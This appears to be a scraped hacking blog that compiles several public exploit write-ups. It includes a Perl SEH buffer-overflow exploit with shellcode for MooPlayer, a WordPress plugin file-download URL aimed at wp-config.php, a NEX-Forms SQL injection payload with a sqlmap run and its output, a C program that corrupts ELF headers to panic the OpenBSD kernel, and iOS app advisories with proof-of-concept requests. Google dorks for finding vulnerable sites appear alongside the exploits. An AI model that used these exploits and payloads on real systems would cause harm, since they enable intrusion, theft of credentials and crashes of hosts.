#!/usr/bin/perl
###########################################################################=
#################################
# Exploit Title: MooPlayer 1.3.0 'm3u' SEH Buffer Overflow
# Date: 09-02-2015
# Exploit Author: Tomislav Paskalev
# Vulnerable Software: MooPlayer v1.3.0
# Vendor Homepage: https://mooplayer.jaleco.com/
# Software Link: http://www.exploit-db.com/apps/a2eba48a6789803f2a3aca8c93b=86cb7-mooplayer-1.3.0.zip
# Version: 1.3.0
# Tested on: Windows XP SP2 EN
# OSVDB-ID: 118128
###########################################################################=
#################################
# Credits:
# Vulnerability identified by Samandeep Singh
# http://www.exploit-db.com/exploits/36022/
###########################################################################=
#################################
# Exploit notes:
# mooplayer.exe was not compiled with SafeSEH, but always contains \x00 (bad character)
# available and could be used, which would make the exploit work across multiple OS
# versions, but the shellcode space would be limited since \x00 would terminate the string
# other available modules (Win XP SP2 EN) - enough space for larger shellcode
# oledlg.dll (Rebase: False | SafeSEH: False | ASLR: False | NXCompat: False | OS Dll: True)
# OLEACC.dll (Rebase: False | SafeSEH: False | ASLR: False | NXCompat: False | OS Dll: True)
###########################################################################=
#################################
# Bad characters:
# "\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09"
# "\x0b\x0c"
# "\x0e\x0f"
# "\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19"
# "\x1a\x1b\x1c\x1d\x1e\x1f"
###########################################################################=
#################################
# How to exploit:
# MooPlayer -> File -> Open Media File -> Files of type: Playlists -> (navigate to created exploit
# file) -> Open
# OR drag and drop created exploit file into MooPlayer
###########################################################################=
#################################
# Thanks to:
# Samandeep Singh (PoC)
# Peter Van Eeckhoutte (exploit development tutorials)
# Offensive Security (IT security courses, admin support)
###########################################################################=
#################################
$file = "MooPlayer_messagebox.m3u";
my $junk = "A" x 264;
my $nextSEH = "\xeb\x20\x90\x90"; # jump over the next 32 bytes
my $SEH = pack('V',0x74c96950); # POP POP RET from oleacc.dll (Win XP SP2 EN)
my $NOPs = "\x90" x 100;
# msfpayload windows/messagebox
# msfencode -e x86/alpha_upper
my $shellcode =
"\x89\xe5\xd9\xf7\xd9\x75\xf4\x5f\x57\x59\x49\x49\x49\x49" .
"\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56" .
"\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41" .
"\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42" .
"\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a\x49\x4e\x39\x5a" .
"\x4b\x4d\x4b\x38\x59\x54\x34\x46\x44\x5a\x54\x46\x51\x39" .
"\x42\x58\x32\x53\x47\x36\x51\x4f\x39\x32\x44\x4c\x4b\x44" .
"\x31\x46\x50\x4c\x4b\x33\x46\x44\x4c\x4c\x4b\x44\x36\x35" .
"\x4c\x4c\x4b\x57\x36\x55\x58\x4c\x4b\x53\x4e\x31\x30\x4c" .
"\x4b\x50\x36\x46\x58\x50\x4f\x52\x38\x54\x35\x4c\x33\x36" .
"\x39\x53\x31\x58\x51\x4b\x4f\x4d\x31\x45\x30\x4c\x4b\x42" .
"\x4c\x57\x54\x47\x54\x4c\x4b\x57\x35\x57\x4c\x4c\x4b\x31" .
"\x44\x51\x38\x33\x48\x35\x51\x4b\x5a\x4c\x4b\x50\x4a\x55" .
"\x48\x4c\x4b\x31\x4a\x31\x30\x55\x51\x5a\x4b\x4b\x53\x56" .
"\x54\x30\x49\x4c\x4b\x50\x34\x4c\x4b\x33\x31\x5a\x4e\x50" .
"\x31\x4b\x4f\x56\x51\x59\x50\x4b\x4c\x4e\x4c\x4b\x34\x59" .
"\x50\x53\x44\x55\x57\x49\x51\x38\x4f\x34\x4d\x33\x31\x59" .
"\x57\x4a\x4b\x4c\x34\x47\x4b\x43\x4c\x57\x54\x51\x38\x34" .
"\x35\x4d\x31\x4c\x4b\x31\x4a\x47\x54\x45\x51\x4a\x4b\x55" .
"\x36\x4c\x4b\x44\x4c\x30\x4b\x4c\x4b\x51\x4a\x35\x4c\x33" .
"\x31\x4a\x4b\x4c\x4b\x43\x34\x4c\x4b\x33\x31\x4b\x58\x4c" .
"\x49\x30\x44\x51\x34\x35\x4c\x55\x31\x38\x43\x4e\x52\x44" .
"\x48\x57\x59\x59\x44\x4d\x59\x4a\x45\x4b\x39\x39\x52\x35" .
"\x38\x4c\x4e\x30\x4e\x44\x4e\x4a\x4c\x50\x52\x4d\x38\x4d" .
"\x4f\x4b\x4f\x4b\x4f\x4b\x4f\x4b\x39\x30\x45\x34\x44\x4f" .
"\x4b\x33\x4e\x49\x48\x4d\x32\x33\x43\x4d\x57\x55\x4c\x51" .
"\x34\x51\x42\x4b\x58\x4c\x4e\x4b\x4f\x4b\x4f\x4b\x4f\x4d" .
"\x59\x37\x35\x53\x38\x33\x58\x32\x4c\x42\x4c\x37\x50\x37" .
"\x31\x43\x58\x50\x33\x37\x42\x36\x4e\x53\x54\x53\x58\x54" .
"\x35\x32\x53\x33\x55\x53\x42\x4b\x38\x31\x4c\x47\x54\x44" .
"\x4a\x4c\x49\x5a\x46\x50\x56\x4b\x4f\x31\x45\x53\x34\x4c" .
"\x49\x39\x52\x56\x30\x4f\x4b\x4e\x48\x4f\x52\x30\x4d\x4f" .
"\x4c\x4d\x57\x55\x4c\x31\x34\x56\x32\x4d\x38\x45\x31\x4b" .
"\x4f\x4b\x4f\x4b\x4f\x53\x58\x46\x38\x31\x30\x51\x30\x51" .
"\x30\x33\x58\x36\x34\x45\x35\x54\x33\x33\x44\x56\x51\x39" .
"\x4b\x4d\x58\x51\x4c\x47\x54\x34\x44\x4b\x39\x5a\x43\x43" .
"\x58\x52\x4e\x56\x4e\x31\x48\x31\x30\x55\x38\x53\x51\x34" .
"\x34\x42\x49\x52\x4f\x32\x48\x54\x30\x42\x4c\x42\x49\x43" .
"\x53\x33\x58\x35\x34\x37\x50\x35\x31\x34\x30\x45\x38\x32" .
"\x4f\x35\x39\x54\x34\x45\x35\x45\x38\x33\x55\x33\x48\x52" .
"\x50\x52\x4c\x45\x38\x44\x34\x32\x48\x35\x35\x57\x50\x53" .
"\x58\x57\x50\x52\x4f\x55\x36\x31\x30\x55\x38\x33\x44\x32" .
"\x45\x34\x38\x34\x34\x32\x48\x31\x30\x55\x33\x52\x4f\x42" .
"\x4e\x32\x48\x51\x30\x43\x44\x32\x48\x43\x55\x43\x58\x32" .
"\x4e\x31\x30\x42\x49\x42\x4e\x52\x48\x42\x55\x33\x44\x32" .
"\x49\x52\x4f\x55\x38\x43\x55\x33\x48\x42\x45\x42\x43\x35" .
"\x38\x52\x4f\x45\x34\x52\x45\x51\x30\x32\x48\x55\x35\x33" .
"\x54\x37\x50\x53\x53\x35\x38\x30\x47\x45\x31\x45\x39\x32" .
"\x4e\x30\x31\x39\x59\x4d\x58\x30\x4c\x57\x54\x50\x42\x4c" .
"\x49\x4b\x51\x30\x31\x58\x52\x42\x4a\x57\x30\x31\x43\x50" .
"\x51\x31\x42\x4b\x4f\x58\x50\x46\x51\x4f\x30\x50\x50\x4b" .
"\x4f\x50\x55\x45\x58\x41\x41";
# keep the exploit length consistent
my $endjunk = "\x90" x (10000 - length($junk.$nextSEH.$SEH.$NOPs.$shellcode));
open(myfile,">$file") ;
print myfile $junk.$nextSEH.$SEH.$NOPs.$shellcode.$endjunk;
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863149338
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
######################
# Exploit Title : WordPress MiwoFTP Plugin 1.0.5 <= Arbitrary File Download
# Exploit Author : Dadou Dz
# Software Link : Premium
# Dork Google: inurl:com_miwoftp
# Affected version: 1.0.5
# Vendor Homepage:
http://miwisoft.com/wordpress-plugins/miwoftp-wordpress-file-manager#changelog
# Date : 2015-04-20
# Tested on : Windows 7 / Mozilla Firefox
# Linux / Mozilla Firefox
######################
# Exploit:
http://TARGET/wp-admin/admin.php?page=miwoftp&option=com_miwoftp&action=download&item=[....somefile....]&order=name&srt=yes
"download_file" : wp-config.php
http://TARGET/wp-admin/admin.php?page=miwoftp&option=com_miwoftp&action=download&item=wp-config.php&order=name&srt=yes
#####################
Discovered By : Dadou Dz
My Email - dadoudzdz@gmail.com
fb: fb.com/Dz2Team
[ Thanks To ]
Toxic Dz ~ faroukovic DZ _ PaWL _ bl4ck-dz _ Abdellah Elmaghribi
Algerian To The Core - Dz Team - 1337day Community Algeria - Fallaga Team
AnonGhost Team - Anonymous Dz - Backup Sec Dz
Sec4ever.com - Gaza-Hacker.net - Dev-Tun.tn - Fallaga.tn - Aljyyosh.com -
dz-root.com
And All My Freinds - All Muslims Hackers - All Algerian Hackers
#####################
######################
# Exploit Title : NEX-Forms 3.0 SQL Injection Vulnerability
# Exploit Author : Claudio Viviani
# Website Author: http://www.homelab.it
http://archive-exploit.homelab.it/1 (Full HomelabIT Vulns Archive)
# Vendor Homepage : https://wordpress.org/plugins/nex-forms-express-wp-form-builder/
# Software Link : https://downloads.wordpress.org/plugin/nex-forms-express-wp-form-builder.3.0.zip
# Dork Google: inurl:nex-forms-express-wp-form-builder
# index of nex-forms-express-wp-form-builder
# Date : 2015-03-29
# Tested on : Windows 7 / Mozilla Firefox
# Linux / Mozilla Firefox
######################
# Info:
The "submit_nex_form" ajax function is affected from SQL Injection vulnerability
"nex_forms_Id" var is not sanitized
# PoC Exploit:
http://TARGET/wordpress/wp-admin/admin-ajax.php?action=submit_nex_form&nex_forms_Id=10 AND (SELECT * FROM (SELECT(SLEEP(10)))NdbE)
# Poc Video:
http://youtu.be/04G08Cbrx1I
# PoC sqlmap:
sqlmap -u "http://TARGET/wordpress/wp-admin/admin-ajax.php?action=submit_nex_form&nex_forms_Id=10" -p nex_forms_Id --dbms mysql
[23:15:37] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[23:15:48] [INFO] GET parameter 'nex_forms_Id' seems to be 'MySQL >= 5.0.12 AND time-based blind (SELECT)' injectable
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n]
[23:15:55] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[23:15:55] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[23:16:01] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[23:16:07] [INFO] checking if the injection point on GET parameter 'nex_forms_Id' is a false positive
GET parameter 'nex_forms_Id' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection points with a total of 85 HTTP(s) requests:
---
Parameter: nex_forms_Id (GET)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: action=submit_nex_form&nex_forms_Id=10 AND (SELECT * FROM (SELECT(SLEEP(5)))NdbE)
---
[23:16:34] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 5.10
web application technology: PHP 5.3.3, Apache 2.2.3
back-end DBMS: MySQL 5.0.12
######################
# Vulnerability Disclosure Timeline:
2015-03-29: Discovered vulnerability
2015-04-16: Vendor Notification
2015-04-17: Vendor Response/Feedback
2015-04-21: Vendor Send Fix/Patch (same version number)
2015-04-21: Public Disclosure
#####################
Discovered By : Claudio Viviani
http://www.homelab.it
http://archive-exploit.homelab.it/1 (Full HomelabIT Vulns Archive)
http://ffhd.homelab.it (Free Fuzzy Hashes Database)
info@homelab.it
homelabit@protonmail.ch
https://www.facebook.com/homelabit
https://twitter.com/homelabit
https://plus.google.com/+HomelabIt1/
https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww
#####################
/*
# Exploit Title: OpenBSD <= 5.6 - Multiple Local Kernel Panics
# Exploit Author: nitr0us
# Vendor Homepage: http://www.openbsd.org
# Version: 5.6
# Tested on: OpenBSD 5.6 i386 (snapshot - Nov 25th, 2014), OpenBSD 5.6 i386, OpenBSD 5.5 i386
* - 0xb16b00b5.c
*
* - Alejandro Hernandez (@nitr0usmx)
* - Mexico 2015
*
* #########################################################################
* # OpenBSD <= 5.6 kernel panic()'s in sys/uvm/uvm_map.c #
* #########################################################################
*
* Tested under:
* - OpenBSD 5.6 i386 (snapshot - Nov 25th, 2014)
* - OpenBSD 5.6 i386
* - OpenBSD 5.5 i386
*
* https://www.youtube.com/watch?feature=player_detailpage&v=PReopSQZOrY#t=20
*
*/
#include <stdio.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/stat.h>
#include <sys/mman.h>
#include <sys/param.h>
#include <sys/types.h>
#ifndef __OpenBSD__
#error "Not OpenBSD !!!1111";
#else
#include <sys/exec_elf.h>
#endif
#ifndef __i386__
#error "Not i386 !!!1111";
#endif
char big_b00bz[] =
" 8M:::::::8888M:::::888:::::::88:::8888888::::::::Mm\n"
" 88MM:::::8888M:::::::88::::::::8:::::888888:::M:::::M\n"
" 8888M:::::888MM::::::::8:::::::::::M::::8888::::M::::M\n"
" 88888M:::::88:M::::::::::8:::::::::::M:::8888::::::M::M\n"
" 88 888MM:::888:M:::::::::::::::::::::::M:8888:::::::::M:\n"
" 8 88888M:::88::M:::::::::::::::::::::::MM:88::::::::::::M\n"
" 88888M:::88::M::::::::::*88*::::::::::M:88::::::::::::::M\n"
" 888888M:::88::M:::::::::88@@88:::::::::M::88::::::::::::::M\n"
" 888888MM::88::MM::::::::88@@88:::::::::M:::8::::::::::::::*8\n"
" 88888 M:::8::MM:::::::::*88*::::::::::M:::::::::::::::::88@@\n"
" 8888 MM::::::MM:::::::::::::::::::::MM:::::::::::::::::88@@\n"
" 888 M:::::::MM:::::::::::::::::::MM::M::::::::::::::::*8\n"
" 888 MM:::::::MMM::::::::::::::::MM:::MM:::::::::::::::M\n"
" 88 M::::::::MMMM:::::::::::MMMM:::::MM::::::::::::MM\n"
" 88 MM:::::::::MMMMMMMMMMMMMMM::::::::MMM::::::::MMM\n"
" 88 MM::::::::::::MMMMMMM::::::::::::::MMMMMMMMMM\n"
" 88 8MM::::::::::::::::::::::::::::::::::MMMMMM\n"
" 8 88MM::::::::::::::::::::::M:::M::::::::MM\n"
" 888MM::::::::::::::::::MM::::::MM::::::M";
int main(int argc, char **argv)
{
Elf32_Ehdr *hdr;
Elf32_Phdr *pht;
struct stat statinfo;
char *elfptr;
int fd;
if(argc != 2) return printf("Usage: %s <elf_exec>\n", argv[0]);
fd = open(argv[1], O_RDWR);
fstat(fd, &statinfo);
elfptr = (char *) mmap(NULL, statinfo.st_size, PROT_READ | PROT_WRITE, MAP_SHARED, fd, 0);
hdr = (Elf32_Ehdr *) (elfptr);
pht = (Elf32_Phdr *) (elfptr + hdr->e_phoff);
printf("%s", big_b00bz);
pht[9].p_type = 0x7defaced; // <--- these overwrites ------------v
pht[2].p_filesz = (arc4random() % 2) ? 0x41414141 : 0x43434343; // are necessary
sleep(3 + (arc4random() % 3));
if(arc4random() % 3 == 2) puts(" .. I like b1g 0nez !!"); // 33.33% chance
else { if(arc4random() % 2){ puts(" .. want s0me ?!"); pht[5].p_vaddr = 0xb16b00b5; } // .6666 * .5 = 33.33% chance
else { puts(" .. j00 like it ?!"); pht[5].p_vaddr = 0x0ace55e8; }} // .6666 * .5 = 33.33% chance
msync(elfptr, 0, MS_ASYNC);
munmap(elfptr, statinfo.st_size);
close(fd);
sleep(3 + (arc4random() % 3));
system(argv[1]); // ( o )( o ) panic()
puts("... s0rry, this piece of sh1t didn't w0rk in j00r obsd\n");
return 0xDEFECA7E;
}
Document Title:
===============
Photo Manager Pro 4.4.0 iOS - Code Execution Vulnerability
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1444
Release Date:
=============
2015-03-10
Vulnerability Laboratory ID (VL-ID):
====================================
1444
Common Vulnerability Scoring System:
====================================
8.6
Product & Service Introduction:
===============================
Do you have troubles for managing thousands of photos and videos? Do you have any private photos or videos? Are you looking for a photo portfolio app?
Photo Manager Pro is exactly you are looking for. Photo Manager Pro is extremely easy to use. TP Transfer: Transfer folders and files between computer
and device over wifi network. HTTP Transfer: Transfer files between computer and device over wifi network. View photos in the browser. Peer to Peer
Transfer: Directly transfer files between iPad, iPhone and iPod Touch over wifi network. USB Transfer: Import/Export photos from/to iTunes file sharing.
Basic Transfer: Import/Export photos from/to the Photos app.
(Copy of the Vendor Homepage: https://itunes.apple.com/de/app/photo-manager-pro/id393858562 & http://www.linkusnow.com/photomanager/help/ipad/help_main.php )
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered a code execution vulnerability in the official Linkus Photo Manager Pro v4.4.0 iOS mobile web-application.
Vulnerability Disclosure Timeline:
==================================
2015-03-10: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Linkus
Product: Photo Manager Pro - iOS Mobile Web Application (Wifi) 4.4.0
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Critical
Technical Details & Description:
================================
An arbitrary code execution vulnerability has been discovered in the official Linkus Photo Manager Pro v4.4.0 iOS mobile web-application.
The vulnerability allows remote attackers to execute malicious codes on the application-side of the vulnerable app to compromise the
target mobile device.
The vulnerability is located in the `folderName` value of the `newfolder.action` module. Remote attackers are able to manipulate the
`folderName` value in the `index.html#?w=300` file POST method request to compromise the application, user session information or connected
device components. The attacker tampers the new Folder POST method request to exchange the regular folderName value with special crafted code.
The input context is becomes visible at the main index service or subfolder (path). The vector of the vulnerability is located on the application-side.
The security risk of the arbitrary code execution vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 8.6.
Exploitation of the arbitrary code execution vulnerability requires no user interaction or privileged web-application user account with password.
Successful exploitation of the vulnerability results in session hijacking, persistent phishing, persistent external redirects and persistent
manipulation function or connected module context.
Request Method(s):
[+] [POST]
Vulnerable Module(s):
[+] newfolder.action
Vulnerable Parameter(s):
[+] folderName
Affected Module(s):
[+] Index (http://localhost:8080)
[+] Sub Category Path
Proof of Concept (PoC):
=======================
The code execution vulnerability can be exploited by remote attackers without privileged application user account or user interaction.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
PoC: Create Folder
<div id="main"><div id="breadcrumb">Home</div>
<div id="content"><ul id="folders_ul"><li><div class="folder_item_bg"><img src="images/blank.gif" class="blank"><a href="browse_folder.html?folderID=1"><img src="images/blank_thumbnail.png" height="86" width="80"></a></div><div class="folder_label"><a href="browse_folder.html?folderID=1">Family</a></div></li><li><div class="folder_item_bg"><img src="images/blank.gif" class="blank"><a href="browse_folder.html?folderID=2"><img src="images/blank_thumbnail.png" height="86" width="80"></a></div><div class="folder_label"><a href="browse_folder.html?folderID=2">Friends</a></div></li><li><div class="folder_item_bg"><img src="images/blank.gif" class="blank"><a href="browse_folder.html?folderID=3"><img src="images/blank_thumbnail.png" height="86" width="80"></a></div><div class="folder_label"><a href="browse_folder.html?folderID=3">Travel</a></div></li><li><div class="folder_item_bg"><img src="images/blank.gif" class="blank"><a href="browse_folder.html?folderID=4"><img src="images/blank_thumbnail.png" height="86" width="80"></a></div><div class="folder_label"><a href="browse_folder.html?folderID=4">Shopping</a></div></li><li><div class="folder_item_bg"><img src="images/blank.gif" class="blank"><a href="browse_folder.html?folderID=5"><img src="images/blank_thumbnail.png" height="86" width="80"></a></div><div class="folder_label"><a href="browse_folder.html?folderID=5">Funny;[CODE EXECUTION VULNERABILITY VIA FOLDERNAME!]></a></div></iframe></a></div></li></ul></div>
</div>
... after surfing to the created folder
<div id="wrapper">
<div id="header">
<div id="title">
<h1>Photo Manager Pro</h1>
</div>
</div>
<div id="main">
<div id="breadcrumb"><span id="breadcrumb_span"><a href="index.html">Home</a><label> > <a href="browse_folder.html?folderID=5">Funny;[CODE EXECUTION VULNERABILITY VIA FOLDERNAME!]></a></label></x></a></label></span></div>
<form id="download_form" action="download.action" method="post">
<div id="content"><ul></ul></div>
</form>
</div>
PoC: Vulnerable Source
}
function createFolder() {
$.ajax({
type: 'POST',
url: 'newfolder.action',
cache: false,
dataType: 'json',
data: {folderName:$('#foldername').attr('value'), isSubfolder:$('#is_subfolder_hidden').attr('value'), parentFolderID:$('#parent_folder_hidden').attr('value')},
async: false,
success: function(result) {
window.location.reload(false);
}
});
}
</script>
--- Poc Session Logs [POST] (Inject) ---
Status: 200[OK]
POST http://localhost:8080/newfolder.action
Load Flags[LOAD_BYPASS_CACHE LOAD_BACKGROUND ] Größe des Inhalts[23] Mime Type[application/x-unknown-content-type]
Request Header:
Host[localhost:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0]
Accept[application/json, text/javascript, */*; q=0.01]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Content-Type[application/x-www-form-urlencoded; charset=UTF-8]
X-Requested-With[XMLHttpRequest]
Referer[http://localhost:8080/index.html]
Content-Length[50]
Cookie[isenabledpasscode=false]
Connection[keep-alive]
Pragma[no-cache]
Cache-Control[no-cache]
POST-Daten:
folderName[*/-CODE EXECUTION VULNERABILITY!;]
isSubfolder[0]
parentFolderID[0]
Response Header:
Accept-Ranges[bytes]
Content-Length[23]
Date[Do., 05 März 2015 20:34:46 GMT]
Status: 200[OK]
GET http://localhost:8080/index.html
Load Flags[VALIDATE_ALWAYS LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[9421] Mime Type[application/x-unknown-content-type]
Request Header:
Host[localhost:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://localhost:8080/browse_folder.html?folderID=6]
Cookie[isenabledpasscode=false]
Connection[keep-alive]
Cache-Control[max-age=0]
Response Header:
Accept-Ranges[bytes]
Content-Length[9421]
Date[Do., 05 März 2015 20:34:46 GMT]
Status: 200[OK]
GET http://localhost:8080/javascript/linkus.js
Load Flags[VALIDATE_ALWAYS ] Größe des Inhalts[397] Mime Type[application/x-unknown-content-type]
Request Header:
Host[localhost:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0]
Accept[*/*]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://localhost:8080/index.html]
Cookie[isenabledpasscode=false]
Connection[keep-alive]
Cache-Control[max-age=0]
Response Header:
Accept-Ranges[bytes]
Content-Length[397]
Date[Do., 05 März 2015 20:34:46 GMT]
Reference(s):
http://localhost:8080/index.html
http://localhost:8080/newfolder.action
http://localhost:8080/index.html#?w=300
http://localhost:8080/browse_folder.html?folderID=5
Solution - Fix & Patch:
=======================
The vulnerability can be patched by a secure parse and encode of the vulnerable folderName value. Restrict the input and filter the context by usage of a own exception to
prevent the application-side code execution.
Security Risk:
==============
The security risk of the code execution vulnerability in the photo manager wifi service is estimated as high. (CVSS 8.6)
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses,
policies, deface websites, hack into databases or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™
--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt
Document Title:
===============
Mobile Drive HD v1.8 - File Include Web Vulnerability
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1446
Release Date:
=============
2015-03-11
Vulnerability Laboratory ID (VL-ID):
====================================
1446
Common Vulnerability Scoring System:
====================================
6.4
Product & Service Introduction:
===============================
Mobile Drive is the ideal app for anyone who transfer documents between PC, iPad and Cloud. Mobile Drive allows you to manage
documents and organize them. You can quickly upload and download documents via email and the popular cloud storage services.
(Copy of the Vendor Homepage: https://itunes.apple.com/en/app/mobile-drive-hd-document-cloud/id626102554 )
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Core Research Team discovered file include web vulnerability in the Mobile Drive HD v1.8 iOS mobile application.
Vulnerability Disclosure Timeline:
==================================
2015-03-11: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Keke Cai
Product: Mobile Drive HD- iOS Mobile Web Application 1.8
Exploitation Technique:
=======================
Local
Severity Level:
===============
High
Technical Details & Description:
================================
A local file include web vulnerability has been discovered in the official USB Disk Free - File Manager & Transfer v1.0 iOS mobile application.
The local file include web vulnerability allows remote attackers to unauthorized include local file/path requests or system specific path commands
to compromise the mobile web-application.
The web vulnerability is located in the `filename` value of the `upload` module. Remote attackers are able to inject own files with malicious
`filename` values in the `upload` POST method request to compromise the mobile web-application. The local file/path include execution occcurs in
the index file dir listing of the wifi interface. The attacker is able to inject the local file include request by usage of the `wifi interface`
in connection with the vulnerable upload POST method request.
Remote attackers are also able to exploit the filename issue in combination with persistent injected script codes to execute different malicious
attack requests. The attack vector is located on the application-side of the wifi service and the request method to inject is POST.
The security risk of the local file include web vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 6.4.
Exploitation of the local file include web vulnerability requires no user interaction or privileged web-application user account. Successful exploitation
of the local file include web vulnerability results in mobile application compromise or connected device component compromise.
Request Method(s):
[+] [POST]
Vulnerable Module(s):
[+] Upload
Vulnerable Parameter(s):
[+] filename
Affected Module(s):
[+] Index File Dir Listing (http://localhost:8080/)
Proof of Concept (PoC):
=======================
The local file include web vulnerability can be exploited by local attackers without privileged application user accounts or user interaction.
For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.
PoC:
http://localhost:8080/files/%3C./[LOCAL FILE INCLUDE VULNERABILITY!]%3E/2.png
PoC: Vulnerable Source
<tr class="shadow"><td><a href="/files/%3Ciframe%3E2.png" class="file">[LOCAL FILE INCLUDE VULNERABILITY!]%3E/2.png</a></td><td class='del'>
<form action='/files/%3C[LOCAL FILE INCLUDE VULNERABILITY!]%3E/2.png' method='post'><input name='_method' value='delete' type='hidden'/>
<input name="commit" type="submit" value="Delete" class='button' /></td></tr></tbody></table></iframe></a></td></tr></tbody>
</table>
--- PoC Session Logs [POST] ---
Status: 302[Found]
POST http://localhost:8080/files Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[67] Mime Type[text/html]
Request Header:
Host[localhost:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://localhost:8080/]
Connection[keep-alive]
POST-Daten:
POST_DATA[-----------------------------21144193462
Content-Disposition: form-data; name="newfile"; filename="[LOCAL FILE INCLUDE VULNERABILITY!]%3E/2.png"
Content-Type: image/png
-
Status: 200[OK]
GET http://localhost:8080/ Load Flags[LOAD_DOCUMENT_URI LOAD_REPLACE LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[2739] Mime Type[application/x-unknown-content-type]
Request Header:
Host[localhost:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://localhost:8080/]
Connection[keep-alive]
Response Header:
Accept-Ranges[bytes]
Content-Length[2739]
Date[Mo., 09 März 2015 14:24:12 GMT]
-
Status: 200[OK]
GET http://localhost:8080/jquery.js Load Flags[LOAD_NORMAL] Größe des Inhalts[55774] Mime Type[application/x-unknown-content-type]
Request Header:
Host[localhost:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0]
Accept[*/*]
